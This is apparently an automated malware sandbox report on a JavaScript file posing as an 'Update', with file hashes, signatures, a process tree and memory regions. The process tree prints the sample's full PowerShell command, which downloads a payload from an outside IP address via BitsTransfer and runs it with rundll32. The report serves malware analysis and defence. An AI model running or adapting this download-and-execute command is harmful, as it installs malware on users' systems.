Resubmissions

15-08-2024 20:42

240815-zhg3jaxglr 10

14-06-2024 12:05

240614-n89dxszekb 10

28-05-2024 22:27

240528-2dhvdagb62 10

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14-06-2024 12:05

General

  • Target

    Update_25_04_2024_3146918.js

  • Size

    135KB

  • MD5

    bf7f711e823916e5f56ff4d2286ee866

  • SHA1

    d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729

  • SHA256

    0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17

  • SHA512

    842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941

  • SSDEEP

    1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2712

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M3VTVE0JAGQQXZPYO29Z.temp

    Filesize

    7KB

    MD5

    a9643602c79da4b46405ce570b3313cb

    SHA1

    e1434b4c5fd0ad936a2a232adb5079b6e62a1f9c

    SHA256

    fb69abd56b5f8951077bacb5aee052dbaf9a2423e28693cacadb822b1ea0b8f2

    SHA512

    05144065abfbc2426e8913fda207174f1fb018242e5a3be5f9b4ee5fd3d99cffa8808cc90b9a1750df8c57ffebed40c63ee41c60e051bee9342da26015d5b244

  • memory/2412-8-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-19-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-7-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-4-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp

    Filesize

    4KB

  • memory/2412-9-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-11-0x00000000029F0000-0x0000000002A22000-memory.dmp

    Filesize

    200KB

  • memory/2412-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

  • memory/2412-23-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-10-0x00000000029F0000-0x0000000002A22000-memory.dmp

    Filesize

    200KB

  • memory/2412-22-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-5-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-20-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp

    Filesize

    4KB

  • memory/2412-21-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2712-18-0x0000000002AF0000-0x0000000002B02000-memory.dmp

    Filesize

    72KB

  • memory/2712-17-0x000000001B860000-0x000000001B882000-memory.dmp

    Filesize

    136KB